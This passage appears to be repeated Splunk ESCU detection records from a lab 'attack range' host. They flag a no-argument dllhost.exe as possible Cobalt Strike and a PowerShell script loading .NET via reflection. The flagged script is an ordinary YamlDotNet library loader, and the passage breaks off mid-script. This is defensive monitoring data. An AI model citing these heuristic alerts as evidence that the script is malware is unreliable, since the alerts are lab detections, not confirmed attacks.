info_min_time="0.000", parent_process_name="unknown", process="C:\\Windows\\System32\\dllhost.exe", process_id="2564", process_name="dllhost.exe", process_path="C:\\Windows\\System32\\dllhost.exe", risk_message="Suspicious dllhost.exe process with no command line arguments executed on win-dc-mhaag-attack-range-622.attackrange.local by $user$", risk_object="win-dc-mhaag-attack-range-622.attackrange.local", risk_object_type="system", risk_score="49.0", savedsearch_description="The following analytic identifies DLLHost.exe with no command line arguments. It is unusual for DLLHost.exe to execute with no command line arguments present. This particular behavior is common with malicious software, including Cobalt Strike. During investigation, identify any network connections and parallel processes. Identify any suspicious module loads related to credential dumping or file writes. DLLHost.exe is natively found in C:\\Windows\\system32 and C:\\Windows\\syswow64." 1664740800, search_name="ESCU - Suspicious DLLHost no Command Line Arguments - Rule", orig_time="1664740800", analyticstories="Cobalt Strike", annotations="{\"analytic_story\": [\"Cobalt Strike\"], \"confidence\": 70, \"context\": [\"Source:Endpoint\", \"Stage:Initial Access\", \"Stage:Execution\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1055\"], \"observable\": [{\"name\": \"dest\", \"role\": [\"Victim\"], \"type\": \"Endpoint\"}, {\"name\": \"User\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Cobalt Strike", annotations.context="Source:Endpoint", annotations.context="Stage:Initial Access", annotations.context="Stage:Execution", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1055", count="1", dest="win-dc-mhaag-attack-range-622.attackrange.local", info_max_time="+Infinity", info_min_time="0.000", parent_process_name="unknown", process="C:\\Windows\\System32\\dllhost.exe", process_id="0xa04", process_name="dllhost.exe", process_path="C:\\Windows\\System32\\dllhost.exe", risk_message="Suspicious dllhost.exe process with no command line arguments executed on win-dc-mhaag-attack-range-622.attackrange.local by $user$", risk_object="win-dc-mhaag-attack-range-622.attackrange.local", risk_object_type="system", risk_score="49.0", savedsearch_description="The following analytic identifies DLLHost.exe with no command line arguments. It is unusual for DLLHost.exe to execute with no command line arguments present. This particular behavior is common with malicious software, including Cobalt Strike. During investigation, identify any network connections and parallel processes. Identify any suspicious module loads related to credential dumping or file writes. DLLHost.exe is natively found in C:\\Windows\\system32 and C:\\Windows\\syswow64." 1664744132, search_name="ESCU - PowerShell Loading DotNET into Memory via Reflection - Rule", Computer="win-dc-mhaag-attack-range-622.attackrange.local", EventCode="4104", Opcode="15", ScriptBlockText="function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } }", UserID="'S-1-5-21-2251518177-1696790515-3014453336-500'", analyticstories="Hermetic Wiper", analyticstories="Malicious PowerShell", annotations="{\"analytic_story\": [\"Hermetic Wiper\", \"Malicious PowerShell\"], \"confidence\": 80, \"context\": [\"Source:Endpoint\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1059\", \"T1059.001\"], \"observable\": [{\"name\": \"Computer\", \"role\": [\"Victim\"], \"type\": \"Hostname\"}, {\"name\": \"UserID\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Hermetic Wiper", annotations.analytic_story="Malicious PowerShell", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1059", annotations.mitre_attack="T1059.001", count="1", firstTime="2022-10-02T19:16:30", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-10-02T19:16:30", risk_message="A suspicious powershell script contains reflective class assembly command in function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } } to load .net code in memory with EventCode 4104 in host win-dc-mhaag-attack-range-622.attackrange.local", risk_object="'S-1-5-21-2251518177-1696790515-3014453336-500'", risk_object_type="user", risk_score="56.0", savedsearch_description="The following analytic utilizes PowerShell Script Block Logging (EventCode=4104) to identify suspicious PowerShell execution. Script Block Logging captures the command sent to PowerShell, the full command to be executed. Upon enabling, logs will output to Windows event logs. Dependent upon volume, enable no critical endpoints or all. This analytic identifies the use of PowerShell loading .net assembly via reflection. This is commonly found in malicious PowerShell usage, including Empire and Cobalt Strike. In addition, the `load(` value may be modifed by removing `(` and it will identify more events to review. During triage, review parallel processes using an EDR product or 4688 events. It will be important to understand the timeline of events around this activity. Review the entire logged PowerShell script block." 1664744132, search_name="ESCU - PowerShell Loading DotNET into Memory via Reflection - Rule", Computer="win-dc-mhaag-attack-range-622.attackrange.local", EventCode="4104", Opcode="15", ScriptBlockText="function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } }", UserID="'S-1-5-21-2251518177-1696790515-3014453336-500'", analyticstories="Hermetic Wiper", analyticstories="Malicious PowerShell", annotations="{\"analytic_story\": [\"Hermetic Wiper\", \"Malicious PowerShell\"], \"confidence\": 80, \"context\": [\"Source:Endpoint\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1059\", \"T1059.001\"], \"observable\": [{\"name\": \"Computer\", \"role\": [\"Victim\"], \"type\": \"Hostname\"}, {\"name\": \"UserID\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Hermetic Wiper", annotations.analytic_story="Malicious PowerShell", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1059", annotations.mitre_attack="T1059.001", count="1", firstTime="2022-10-02T19:16:30", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-10-02T19:16:30", risk_message="A suspicious powershell script contains reflective class assembly command in function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } } to load .net code in memory with EventCode 4104 in host win-dc-mhaag-attack-range-622.attackrange.local", risk_object="win-dc-mhaag-attack-range-622.attackrange.local", risk_object_type="system", risk_score="56.0", savedsearch_description="The following analytic utilizes PowerShell Script Block Logging (EventCode=4104) to identify suspicious PowerShell execution. Script Block Logging captures the command sent to PowerShell, the full command to be executed. Upon enabling, logs will output to Windows event logs. Dependent upon volume, enable no critical endpoints or all. This analytic identifies the use of PowerShell loading .net assembly via reflection. This is commonly found in malicious PowerShell usage, including Empire and Cobalt Strike. In addition, the `load(` value may be modifed by removing `(` and it will identify more events to review. During triage, review parallel processes using an EDR product or 4688 events. It will be important to understand the timeline of events around this activity. Review the entire logged PowerShell script block." 1664744132, search_name="ESCU - PowerShell Loading DotNET into Memory via Reflection - Rule", Computer="win-dc-mhaag-attack-range-622.attackrange.local", EventCode="4104", Opcode="15", ScriptBlockText="# Copyright 2016 Cloudbase Solutions Srl # # Licensed under the Apache License, Version 2.0 (the \"License\"); you may # not use this file except in compliance with the License. You may obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # under the License. # $here = Split-Path -Parent $MyInvocation.MyCommand.Path function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } } function Initialize-Assemblies { $requiredTypes = @( \"Parser\", \"MergingParser\", \"YamlStream\", \"YamlMappingNode\", \"YamlSequenceNode\", \"YamlScalarNode\", \"ChainedEventEmitter\", \"Serializer\", \"Deserializer\", \"SerializerBuilder\", \"StaticTypeResolver\" ) $yaml = [System.AppDomain]::CurrentDomain.GetAssemblies() | ? Location -Match \"YamlDotNet.dll\" if (!$yaml) { return Load-Assembly } foreach ($i in $requiredTypes){ if ($i -notin $yaml.DefinedTypes.Name) { Throw \"YamlDotNet is loaded but missing required types ($i). Older version installed on system?\" } } } Initialize-Assemblies | Out-Null", UserID="'S-1-5-21-2251518177-1696790515-3014453336-500'", analyticstories="Hermetic Wiper", analyticstories="Malicious PowerShell", annotations="{\"analytic_story\": [\"Hermetic Wiper\", \"Malicious PowerShell\"], \"confidence\": 80, \"context\": [\"Source:Endpoint\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1059\", \"T1059.001\"], \"observable\": [{\"name\": \"Computer\", \"role\": [\"Victim\"], \"type\": \"Hostname\"}, {\"name\": \"UserID\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Hermetic Wiper", annotations.analytic_story="Malicious PowerShell", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1059", annotations.mitre_attack="T1059.001", count="1", firstTime="2022-10-02T19:16:30", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-10-02T19:16:30", risk_message="A suspicious powershell script contains reflective class assembly command in # Copyright 2016 Cloudbase Solutions Srl # # Licensed under the Apache License, Version 2.0 (the \"License\"); you may # not use this file except in compliance with the License. You may obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # under the License. # $here = Split-Path -Parent $MyInvocation.MyCommand.Path function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } } function Initialize-Assemblies { $requiredTypes = @( \"Parser\", \"MergingParser\", \"YamlStream\", \"YamlMappingNode\", \"YamlSequenceNode\", \"YamlScalarNode\", \"ChainedEventEmitter\", \"Serializer\", \"Deserializer\", \"SerializerBuilder\", \"StaticTypeResolver\" ) $yaml = [System.AppDomain]::CurrentDomain.GetAssemblies() | ? Location -Match \"YamlDotNet.dll\" if (!$yaml) { return Load-Assembly } foreach ($i in $requiredTypes){ if ($i -notin $yaml.DefinedTypes.Name) { Throw \"YamlDotNet is loaded but missing required types ($i). Older version installed on system?\" } } } Initialize-Assemblies | Out-Null to load .net code in memory with EventCode 4104 in host win-dc-mhaag-attack-range-622.attackrange.local", risk_object="'S-1-5-21-2251518177-1696790515-3014453336-500'", risk_object_type="user", risk_score="56.0", savedsearch_description="The following analytic utilizes PowerShell Script Block Logging (EventCode=4104) to identify suspicious PowerShell execution. Script Block Logging captures the command sent to PowerShell, the full command to be executed. Upon enabling, logs will output to Windows event logs. Dependent upon volume, enable no critical endpoints or all. This analytic identifies the use of PowerShell loading .net assembly via reflection. This is commonly found in malicious PowerShell usage, including Empire and Cobalt Strike. In addition, the `load(` value may be modifed by removing `(` and it will identify more events to review. During triage, review parallel processes using an EDR product or 4688 events. It will be important to understand the timeline of events around this activity. Review the entire logged PowerShell script block." 1664744132, search_name="ESCU - PowerShell Loading DotNET into Memory via Reflection - Rule", Computer="win-dc-mhaag-attack-range-622.attackrange.local", EventCode="4104", Opcode="15", ScriptBlockText="# Copyright 2016 Cloudbase Solutions Srl # # Licensed under the Apache License, Version 2.0 (the \"License\"); you may # not use this file except in compliance with the License. You may obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # under the License. # $here = Split-Path -Parent $MyInvocation.MyCommand.Path function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } } function Initialize-Assemblies { $requiredTypes = @( \"Parser\", \"MergingParser\", \"YamlStream\", \"YamlMappingNode\", \"YamlSequenceNode\", \"YamlScalarNode\", \"ChainedEventEmitter\", \"Serializer\", \"Deserializer\", \"SerializerBuilder\", \"StaticTypeResolver\" ) $yaml = [System.AppDomain]::CurrentDomain.GetAssemblies() | ? Location -Match \"YamlDotNet.dll\" if (!$yaml) { return Load-Assembly } foreach ($i in $requiredTypes){ if ($i -notin $yaml.DefinedTypes.Name) { Throw \"YamlDotNet is loaded but missing required types ($i). Older version installed on system?\" } } } Initialize-Assemblies | Out-Null", UserID="'S-1-5-21-2251518177-1696790515-3014453336-500'", analyticstories="Hermetic Wiper", analyticstories="Malicious PowerShell", annotations="{\"analytic_story\": [\"Hermetic Wiper\", \"Malicious PowerShell\"], \"confidence\": 80, \"context\": [\"Source:Endpoint\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1059\", \"T1059.001\"], \"observable\": [{\"name\": \"Computer\", \"role\": [\"Victim\"], \"type\": \"Hostname\"}, {\"name\": \"UserID\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Hermetic Wiper", annotations.analytic_story="Malicious PowerShell", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1059", annotations.mitre_attack="T1059.001", count="1", firstTime="2022-10-02T19:16:30", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-10-02T19:16:30", risk_message="A suspicious powershell script contains reflective class assembly command in # Copyright 2016 Cloudbase Solutions Srl # # Licensed under the Apache License, Version 2.0 (the \"License\"); you may # not use this file except in compliance with the License. You may obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # under the License. # $here = Split-Path -Parent $MyInvocation.MyCommand.Path function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } } function Initialize-Assemblies { $requiredTypes = @( \"Parser\", \"MergingParser\", \"YamlStream\", \"YamlMappingNode\", \"YamlSequenceNode\", \"YamlScalarNode\", \"ChainedEventEmitter\", \"Serializer\", \"Deserializer\", \"SerializerBuilder\", \"StaticTypeResolver\" ) $yaml = [System.AppDomain]::CurrentDomain.GetAssemblies() | ? Location -Match \"YamlDotNet.dll\" if (!$yaml) { return Load-Assembly } foreach ($i in $requiredTypes){ if ($i -notin $yaml.DefinedTypes.Name) { Throw \"YamlDotNet is loaded but missing required types ($i). Older version installed on system?\" } } } Initialize-Assemblies | Out-Null to load .net code in memory with EventCode 4104 in host win-dc-mhaag-attack-range-622.attackrange.local", risk_object="win-dc-mhaag-attack-range-622.attackrange.local", risk_object_type="system", risk_score="56.0", savedsearch_description="The following analytic utilizes PowerShell Script Block Logging (EventCode=4104) to identify suspicious PowerShell execution. Script Block Logging captures the command sent to PowerShell, the full command to be executed. Upon enabling, logs will output to Windows event logs. Dependent upon volume, enable no critical endpoints or all. This analytic identifies the use of PowerShell loading .net assembly via reflection. This is commonly found in malicious PowerShell usage, including Empire and Cobalt Strike. In addition, the `load(` value may be modifed by removing `(` and it will identify more events to review. During triage, review parallel processes using an EDR product or 4688 events. It will be important to understand the timeline of events around this activity. Review the entire logged PowerShell script block." 1664737200, search_name="ESCU - Suspicious DLLHost no Command Line Arguments - Rule", orig_time="1664737200", analyticstories="Cobalt Strike", annotations="{\"analytic_story\": [\"Cobalt Strike\"], \"confidence\": 70, \"context\": [\"Source:Endpoint\", \"Stage:Initial Access\", \"Stage:Execution\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1055\"], \"observable\": [{\"name\": \"dest\", \"role\": [\"Victim\"], \"type\": \"Endpoint\"}, {\"name\": \"User\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Cobalt Strike", annotations.context="Source:Endpoint", annotations.context="Stage:Initial Access", annotations.context="Stage:Execution", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1055", count="1", dest="win-dc-mhaag-attack-range-622.attackrange.local", info_max_time="+Infinity", info_min_time="0.000", parent_process_name="unknown", process="C:\\Windows\\System32\\dllhost.exe", process_id="3420", process_name="dllhost.exe", process_path="C:\\Windows\\System32\\dllhost.exe", risk_message="Suspicious dllhost.exe process with no command line arguments executed on win-dc-mhaag-attack-range-622.attackrange.local by $user$", risk_object="win-dc-mhaag-attack-range-622.attackrange.local", risk_object_type="system", risk_score="49.0", savedsearch_description="The following analytic identifies DLLHost.exe with no command line arguments. It is unusual for DLLHost.exe to execute with no command line arguments present. This particular behavior is common with malicious software, including Cobalt Strike. During investigation, identify any network connections and parallel processes. Identify any suspicious module loads related to credential dumping or file writes. DLLHost.exe is natively found in C:\\Windows\\system32 and C:\\Windows\\syswow64." 1664737200, search_name="ESCU - Suspicious DLLHost no Command Line Arguments - Rule", orig_time="1664737200", analyticstories="Cobalt Strike", annotations="{\"analytic_story\": [\"Cobalt Strike\"], \"confidence\": 70, \"context\": [\"Source:Endpoint\", \"Stage:Initial Access\", \"Stage:Execution\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1055\"], \"observable\": [{\"name\": \"dest\", \"role\": [\"Victim\"], \"type\": \"Endpoint\"}, {\"name\": \"User\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Cobalt Strike", annotations.context="Source:Endpoint", annotations.context="Stage:Initial Access", annotations.context="Stage:Execution", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1055", count="1", dest="win-dc-mhaag-attack-range-622.attackrange.local", info_max_time="+Infinity", info_min_time="0.000", parent_process_name="unknown", process="C:\\Windows\\System32\\dllhost.exe", process_id="0xd5c", process_name="dllhost.exe", process_path="C:\\Windows\\System32\\dllhost.exe", risk_message="Suspicious dllhost.exe process with no command line arguments executed on win-dc-mhaag-attack-range-622.attackrange.local by $user$", risk_object="win-dc-mhaag-attack-range-622.attackrange.local", risk_object_type="system", risk_score="49.0", savedsearch_description="The following analytic identifies DLLHost.exe with no command line arguments. It is unusual for DLLHost.exe to execute with no command line arguments present. This particular behavior is common with malicious software, including Cobalt Strike. During investigation, identify any network connections and parallel processes. Identify any suspicious module loads related to credential dumping or file writes. DLLHost.exe is natively found in C:\\Windows\\system32 and C:\\Windows\\syswow64." 1664740532, search_name="ESCU - PowerShell Loading DotNET into Memory via Reflection - Rule", Computer="win-dc-mhaag-attack-range-622.attackrange.local", EventCode="4104", Opcode="15", ScriptBlockText="function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } }", UserID="'S-1-5-21-2251518177-1696790515-3014453336-500'", analyticstories="Hermetic Wiper", analyticstories="Malicious PowerShell", annotations="{\"analytic_story\": [\"Hermetic Wiper\", \"Malicious PowerShell\"], \"confidence\": 80, \"context\": [\"Source:Endpoint\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1059\", \"T1059.001\"], \"observable\": [{\"name\": \"Computer\", \"role\": [\"Victim\"], \"type\": \"Hostname\"}, {\"name\": \"UserID\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Hermetic Wiper", annotations.analytic_story="Malicious PowerShell", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1059", annotations.mitre_attack="T1059.001", count="1", firstTime="2022-10-02T18:16:30", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-10-02T18:16:30", risk_message="A suspicious powershell script contains reflective class assembly command in function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } } to load .net code in memory with EventCode 4104 in host win-dc-mhaag-attack-range-622.attackrange.local", risk_object="'S-1-5-21-2251518177-1696790515-3014453336-500'", risk_object_type="user", risk_score="56.0", savedsearch_description="The following analytic utilizes PowerShell Script Block Logging (EventCode=4104) to identify suspicious PowerShell execution. Script Block Logging captures the command sent to PowerShell, the full command to be executed. Upon enabling, logs will output to Windows event logs. Dependent upon volume, enable no critical endpoints or all. This analytic identifies the use of PowerShell loading .net assembly via reflection. This is commonly found in malicious PowerShell usage, including Empire and Cobalt Strike. In addition, the `load(` value may be modifed by removing `(` and it will identify more events to review. During triage, review parallel processes using an EDR product or 4688 events. It will be important to understand the timeline of events around this activity. Review the entire logged PowerShell script block." 1664740532, search_name="ESCU - PowerShell Loading DotNET into Memory via Reflection - Rule", Computer="win-dc-mhaag-attack-range-622.attackrange.local", EventCode="4104", Opcode="15", ScriptBlockText="function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } }", UserID="'S-1-5-21-2251518177-1696790515-3014453336-500'", analyticstories="Hermetic Wiper", analyticstories="Malicious PowerShell", annotations="{\"analytic_story\": [\"Hermetic Wiper\", \"Malicious PowerShell\"], \"confidence\": 80, \"context\": [\"Source:Endpoint\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1059\", \"T1059.001\"], \"observable\": [{\"name\": \"Computer\", \"role\": [\"Victim\"], \"type\": \"Hostname\"}, {\"name\": \"UserID\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Hermetic Wiper", annotations.analytic_story="Malicious PowerShell", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1059", annotations.mitre_attack="T1059.001", count="1", firstTime="2022-10-02T18:16:30", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-10-02T18:16:30", risk_message="A suspicious powershell script contains reflective class assembly command in function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } } to load .net code in memory with EventCode 4104 in host win-dc-mhaag-attack-range-622.attackrange.local", risk_object="win-dc-mhaag-attack-range-622.attackrange.local", risk_object_type="system", risk_score="56.0", savedsearch_description="The following analytic utilizes PowerShell Script Block Logging (EventCode=4104) to identify suspicious PowerShell execution. Script Block Logging captures the command sent to PowerShell, the full command to be executed. Upon enabling, logs will output to Windows event logs. Dependent upon volume, enable no critical endpoints or all. This analytic identifies the use of PowerShell loading .net assembly via reflection. This is commonly found in malicious PowerShell usage, including Empire and Cobalt Strike. In addition, the `load(` value may be modifed by removing `(` and it will identify more events to review. During triage, review parallel processes using an EDR product or 4688 events. It will be important to understand the timeline of events around this activity. Review the entire logged PowerShell script block." 1664740532, search_name="ESCU - PowerShell Loading DotNET into Memory via Reflection - Rule", Computer="win-dc-mhaag-attack-range-622.attackrange.local", EventCode="4104", Opcode="15", ScriptBlockText="# Copyright 2016 Cloudbase Solutions Srl # # Licensed under the Apache License, Version 2.0 (the \"License\"); you may # not use this file except in compliance with the License. You may obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # under the License. # $here = Split-Path -Parent $MyInvocation.MyCommand.Path function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return 